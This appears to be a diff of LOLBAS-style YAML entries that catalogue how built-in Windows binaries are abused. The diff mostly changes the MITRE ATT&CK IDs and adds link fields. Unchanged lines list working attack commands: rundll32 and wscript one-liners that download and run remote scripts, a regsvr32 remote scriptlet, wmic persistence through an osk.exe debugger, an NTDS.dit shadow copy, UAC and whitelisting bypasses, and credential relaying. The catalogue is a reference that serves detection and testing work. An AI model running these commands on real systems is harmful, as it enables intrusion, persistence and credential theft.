   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

yml/OSBinaries/Regsvr32.yml

@@ -9,28 +9,32 @@ Commands:
     Usecase: Execute code from remote scriptlet, bypass Application whitelisting
     Category: AWL bypass
     Privileges: User
-    MitreID: T1218.010
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
     Description: Execute the specified local .SCT script with scrobj.dll.
     Usecase: Execute code from scriptlet, bypass Application whitelisting
     Category: AWL bypass
     Privileges: User
-    MitreID: T1218.010
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
     Description: Execute the specified remote .SCT script with scrobj.dll.
     Usecase: Execute code from remote scriptlet, bypass Application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1218.010
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
     Description: Execute the specified local .SCT script with scrobj.dll.
     Usecase: Execute code from scriptlet, bypass Application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1218.010
+    MitreID: T1117
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regsvr32.exe
@@ -43,7 +47,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

yml/OSBinaries/Replace.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
     Description: Download/Copy bar.exe to outdir
@@ -17,6 +18,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\replace.exe

yml/OSBinaries/Rpcping.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Credentials
     Privileges: User
     MitreID: T1003
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
     Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
@@ -17,6 +18,7 @@ Commands:
     Category: Credentials
     Privileges: User
     MitreID: T1187
+    MitreLink: https://attack.mitre.org/techniques/T1187/
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\rpcping.exe

yml/OSBinaries/Rundll32.yml

@@ -9,56 +9,64 @@ Commands:
     Usecase: Execute dll file
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
     Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
     Usecase: Execute DLL from SMB share.
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/techniques/T1085
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
     Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
     Usecase: Execute code from Internet
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
     Usecase: Proxy execution
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
     Usecase: Proxy execution
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
     Usecase: Execute code from Internet
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
     Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
     Usecase: Execute code from alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe -sta {CLSID}
     Description: Use Rundll32.exe to load a registered or hijacked COM Server payload.  Also works with ProgID.
     Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
     Category: Execute
     Privileges: User
-    MitreID: T1218.011
+    MitreID:
+    MitreLink:
     OperatingSystem: Windows 10 (and likely previous versions)
 Full_Path:
   - Path: C:\Windows\System32\rundll32.exe

yml/OSBinaries/Runonce.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\runonce.exe

yml/OSBinaries/Runscripthelper.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe

yml/OSBinaries/Sc.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Execute binary file hidden inside an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\sc.exe

yml/OSBinaries/Schtasks.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
     Category: Execute
     Privileges: User
-    MitreID: T1053.005
+    MitreID: T1053
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1053
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\schtasks.exe

yml/OSBinaries/Scriptrunner.yml

@@ -6,17 +6,19 @@ Created: 2018-05-25
 Commands:
   - Command: Scriptrunner.exe -appvscript calc.exe
     Description: Executes calc.exe
-    Usecase: Execute binary through proxy binary to evade defensive counter measures
+    Usecase: Execute binary through proxy binary to evade defensive counter measurments
-    Category: Execute
-    Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
-    Description: Executes calc.cmd from remote server
-    Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
+    Description: Executes calc.cmde from remote server
+    Usecase: Execute binary through proxy binary  from external server to evade defensive counter measurments
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\scriptrunner.exe

yml/OSBinaries/SettingSyncHost.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
   - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
     Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
@@ -17,6 +18,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\SettingSyncHost.exe

yml/OSBinaries/Stordiag.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\stordiag.exe

yml/OSBinaries/Syncappvpublishingserver.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
 Full_Path:
   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe

yml/OSBinaries/Ttdinject.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Spawn process using other binary
     Category: Execute
     Privileges: Administrator
-    MitreID: T1127
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 2004
   - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
     Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
     Usecase: Spawn process using other binary
     Category: Execute
     Privileges: Administrator
-    MitreID: T1127
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 1909
 Full_Path:
   - Path: C:\Windows\System32\ttdinject.exe

yml/OSBinaries/Tttracer.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Spawn process using other binary
     Category: Execute
     Privileges: Administrator
-    MitreID: T1127
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 1809 and newer
   - Command: TTTracer.exe -dumpFull -attach pid
     Description: Dumps process using tttracer.exe. Requires administrator privileges
@@ -17,6 +18,7 @@ Commands:
     Category: Dump
     Privileges: Administrator
     MitreID: T1003
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows 10 1809 and newer
 Full_Path:
   - Path: C:\Windows\System32\tttracer.exe

yml/OSBinaries/Vbc.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10,7
   - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
     Description: Description of the second command
@@ -17,6 +18,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10,7
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

yml/OSBinaries/Verclsid.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Run a com object created in registry to evade defensive counter measures
     Category: Execute
     Privileges: User
-    MitreID: T1218.012
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\verclsid.exe

yml/OSBinaries/Wab.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Program Files\Windows Mail\wab.exe

yml/OSBinaries/Wmic.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process call create calc
     Description: Execute calc from wmic
@@ -17,6 +18,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
     Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
@@ -24,6 +26,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
     Description: Execute evil.exe on the remote system.
@@ -31,6 +34,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
     Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
@@ -38,6 +42,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
     Description: Create a volume shadow copy of NTDS.dit that can be copied.
@@ -45,6 +50,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
     Description: Create a volume shadow copy of NTDS.dit that can be copied.
@@ -52,6 +58,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
     Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
@@ -59,6 +66,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wbem\wmic.exe

yml/OSBinaries/WorkFolders.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\WorkFolders.exe

yml/OSBinaries/Wscript.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Execute hidden code to evade defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
     Description: Download and execute script stored in an alternate data stream
     Usecase: Execute hidden code to evade defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wscript.exe

yml/OSBinaries/Wsreset.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC bypass
     Privileges: User
-    MitreID: T1548.002
+    MitreID: T1088
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1088
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\wsreset.exe